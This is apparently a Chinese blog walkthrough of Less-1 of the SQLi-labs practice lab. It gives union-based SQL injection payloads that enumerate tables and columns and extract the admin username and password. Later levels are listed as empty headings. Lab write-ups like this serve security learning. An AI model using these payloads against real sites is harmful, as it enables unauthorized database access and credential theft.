SQLi-labs(SQL注入练习)

本文详细介绍了如何通过SQL注入攻击来探测网站的安全漏洞,包括判断注入点存在、猜解SQL查询语句字段数、获取数据库信息及用户账号密码等步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、 Page-1(Basic Challenges)

【Less-1】
①判断是否存在注入
输入参数,有输出
在这里插入图片描述

id=1’有报错,证明有注入点

在这里插入图片描述

②猜解SQL查询语句中的字段数
Order by 3 正常:
在这里插入图片描述

Order by 4 不正常:
在这里插入图片描述

所以字段数为3

③确定显示的字段

2和3是显示位:
在这里插入图片描述

④获取当前数据库、版本

在这里插入图片描述

⑤获取数据库中的表
?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”–+

在这里插入图片描述

⑥获取表中的字段名
?id=-1’ union select 1,group_concat(column_name),3
from information_schema.columns where table_name=‘users’–+’

在这里插入图片描述

⑦拿到账号密码
?id=-1’ union select 1,concat(username,’@@’,password),3 from users where username=“admin”–+’
拿到admin的账号密码
在这里插入图片描述

【Less-2】
【Less-3】
【Less-4】
【Less-5】
【Less-6】
【Less-7】
【Less-8】
【Less-9】
【Less-10】
【Less-11】
【Less-12】
【Less-13】
【Less-14】
【Less-15】
【Less-16】
【Less-17】
【Less-18】
【Less-19】
【Less-20】
【Less-21】
【Less-22】

二、Page-2 (Advanced Injections)

三、Page-3 (Stacked Injections)

四、Page-4 (Challenges)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值